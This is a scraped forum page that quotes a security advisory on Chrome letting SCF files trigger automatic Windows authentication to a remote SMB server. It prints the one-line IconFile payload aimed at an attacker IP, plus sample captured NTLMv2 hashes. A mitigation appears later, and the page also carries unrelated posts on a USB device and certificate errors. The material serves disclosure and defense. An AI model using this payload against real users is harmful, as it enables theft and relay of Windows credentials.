Windows 10: Warning: Attackers can Steal Windows Credentials using Google Chrome

As with Windows shortcut LNK files, the icon location is automatically resolved when the file is shown in Explorer. Setting an icon location to a remote SMB server is a known attack vector that abuses the Windows automatic authentication feature when accessing services like remote file shares. But what is the difference between LNK and SCF from the attack standpoint? Chrome sanitizes LNK files by forcing a .download extension ever since Stuxnet[3] but does not give the same treatment to SCF files.

SCF file that can be used to trick Windows into an authentication attempt to a remote SMB server contains only two lines, as shown in the following example:

Code: [Shell] IconFile=\\170.170.170.170\icon[/quote]
Once downloaded, the request is triggered the very moment the download directory is opened in Windows File Explorer to view the file, delete it or work with other files (which is pretty much inevitable). There is no need to click or open the downloaded file – Windows File Explorer will automatically try to retrieve the "icon ".

The remote SMB server set up by the attacker is ready to capture the victim's username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password. The captured information may look like the following:

Code: [*] SMB Captured - 2017-05-15 13:10:44 +0200 NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182 USER:Bosko DOMAIN:Master OS: LM: LMHASHisabled LM_CLIENT_CHALLENGEisabled NTHASH:98daf39c3a253bbe4a289e7a746d4b24 NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000 00000000000 Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201 ccf26d91cd9e326e00000000020000000000000000000000[/quote] The above example shows a disclosure of victim's username, domain and NTLMv2 password hash.

It is worth mentioning that SCF files will appear extensionless in Windows Explorer regardless of file and folder settings. Therefore, file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to inconspicuous nature of attacks using SCF files...

[/quote]
Read more: DefenseCode - Home

 

Thanks.....I'm currently using Chrome. I already have that box checked. I will read the whole article when I get some free time. Thanks again for the heads up.

:)

 

This USB Device Can Steal Information, Even if PC is Locked

http://anonhq.com/usb-device-steal-information-even-pc-locked/

Most of you probably already know about this. But i have some questions.

1) if no user is actively logged in (just the login screen), can the device steal credentials?

2) If group policy blocks the installation of USB devices, can this device steal credentials?

Thank you.

 

Cannot access all google sites like gmail google search, and facebook, youtube.

What do I do? Went through all that online forums said and still cannot get access to google and sites like gamil, facebook, youtube on all my browsers such as ie,edge, chrome, firefox.
1. windows 10, chrome, time & date all up to date
2. disabled all extensions on all browsers.
3. reset all internet settings and deleted all history, caches and everything.

4. I ran the sites in incognito but got the same error code.
5. I ran the sites on Firefox and Edge and they cant be accessed either. No browsers can access these sities.

6. Disabled all anti virus and firewalls on my laptop

7. set up a new microsoft account and user on my laptop, same problem, can't access those sites only, on all browsers

I did all those. And this is still what I get on edge

There’s a problem with this website’s security certificate

This might mean that someone’s trying to fool you or steal any info you send to the server. You should close this site immediately.


L: Go to my homepage instead


Continue to this webpage (not recommended)

and If I continue to the webpage, it simply can't find the page

HTTP 404 error That’s odd... Microsoft Edge can’t find this page

Try this

• Retype the web address
• Go back to the last page

This is what it shows on google chrome,

Your connection is not private
Attackers might be trying to steal your information from www.google.com.sg (for example, passwords, messages, or credit cards).



NET::ERR_CERT_COMMON_NAME_

www.google.com.sg normally uses encryption to protect your information. When Google Chrome tried to connect to www.google.com.sg this
time, the website sent back unusual and incorrect credentials. This may happen when an attacker is trying to pretend to be www.google.com.sg, or a Wi-Fi sign-in screen has interrupted
the connection. Your information is still secure because Google Chrome stopped the connection before any data was exchanged.

You cannot visit www.google.com.sg right now because the website uses HSTS. Network errors and attacks are usually temporary, so this page will probably work later. Learn more.

I am pretty sure that has to do with travelling to China and using internet there with my laptop. Since all the pages banned in China, I cant access them now too when I'm back to my home country. Can anyone explain this and what should I do??

 

Brink, thanks for the heads up...

 

And here is the solution

Block outbound SMB connections (TCP ports 139 and 445) from the local network to the WAN via firewalls, so that local computers can not query remote SMB servers.

 

Thanks for the heads up Brink.